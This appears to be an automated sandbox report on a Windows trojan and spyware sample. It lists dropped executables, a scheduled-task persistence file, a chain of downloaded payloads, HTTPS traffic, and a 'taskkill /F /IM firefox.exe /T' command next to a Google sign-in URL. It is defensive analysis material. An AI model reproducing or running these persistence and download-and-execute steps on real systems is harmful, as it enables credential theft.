Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: ea2c7beae0.exe, 0000000B.00000003.2643177611.00000000055E2000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ea2c7beae0.exe, 0000000B.00000003.2643177611.00000000055E2000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2921279103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdY
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49971 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50050 version: TLS 1.2

System Summary

Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fa692f1b-b
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_fa96ee07-5
Source: 8X6R8OO7U6CNLMSAL.exe.11.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_10268e79-2
Source: 8X6R8OO7U6CNLMSAL.exe.11.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b6ab8011-e
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: .idata
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: ea2c7beae0.exe.6.dr Static PE information: section name:
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .rsrc
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .rsrc
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .idata
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .idata
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .rsrc
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .idata
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .idata
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: num[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A5E530 6_2_00A5E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A978BB 6_2_00A978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A98860 6_2_00A98860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A97049 6_2_00A97049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A931A8 6_2_00A931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A54DE0 6_2_00A54DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A92D10 6_2_00A92D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A9779B 6_2_00A9779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A54B30 6_2_00A54B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A87F36 6_2_00A87F36
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B40228 7_2_00B40228
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B6E8A0 7_2_00B6E8A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B7A0D0 7_2_00B7A0D0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B42030 7_2_00B42030
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3E1A0 7_2_00B3E1A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B35160 7_2_00B35160
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B74A40 7_2_00B74A40
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3A300 7_2_00B3A300
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B37CA4 7_2_00B37CA4
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B4049B 7_2_00B4049B
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B44487 7_2_00B44487
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5CCD0 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5C470 7_2_00B5C470
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B335B0 7_2_00B335B0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B4C5F0 7_2_00B4C5F0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5FD10 7_2_00B5FD10
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3BEB0 7_2_00B3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B46EBF 7_2_00B46EBF
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3AF10 7_2_00B3AF10
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: String function: 00B4D300 appears 47 times
Source: h3yRbjNWk1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: h3yRbjNWk1.exe Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: h3yRbjNWk1.exe Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: skotes.exe.0.dr Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9993038366336634
Source: ea2c7beae0.exe.6.dr Static PE information: Section: ZLIB complexity 0.9993038366336634
Source: random[1].exe0.6.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: 6a8d4317d4.exe.6.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: random[1].exe1.6.dr Static PE information: Section: vnhbgiry ZLIB complexity 0.9948363783965363
Source: 4af6eb3e1f.exe.6.dr Static PE information: Section: vnhbgiry ZLIB complexity 0.9948363783965363
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: 6a8d4317d4.exe, 00000008.00000003.2496940953.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000008.00000002.2538148341.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, 6a8d4317d4.exe, 0000000E.00000003.2654891019.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2695730886.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, num.exe, 0000000F.00000002.2730597985.000000000066E000.00000002.00000001.01000000.0000000E.sdmp, num.exe, 0000000F.00000000.2678893540.000000000066E000.00000002.00000001.01000000.0000000E.sdmp, 6a8d4317d4.exe, 00000011.00000002.2864835627.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, 6a8d4317d4.exe, 00000011.00000003.2821857520.0000000005490000.00000004.00001000.00020000.00000000.sdmp, TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe, 00000012.00000003.2881192763.0000000005160000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000013.00000002.2900637213.000000000066E000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/15@36/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: h3yRbjNWk1.exe ReversingLabs: Detection: 44%
Source: h3yRbjNWk1.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6a8d4317d4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File read: C:\Users\user\Desktop\h3yRbjNWk1.exe
Source: unknown Process created: C:\Users\user\Desktop\h3yRbjNWk1.exe "C:\Users\user\Desktop\h3yRbjNWk1.exe"
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: unknown Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe "C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe "C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe "C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe"
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe "C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe "C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe"
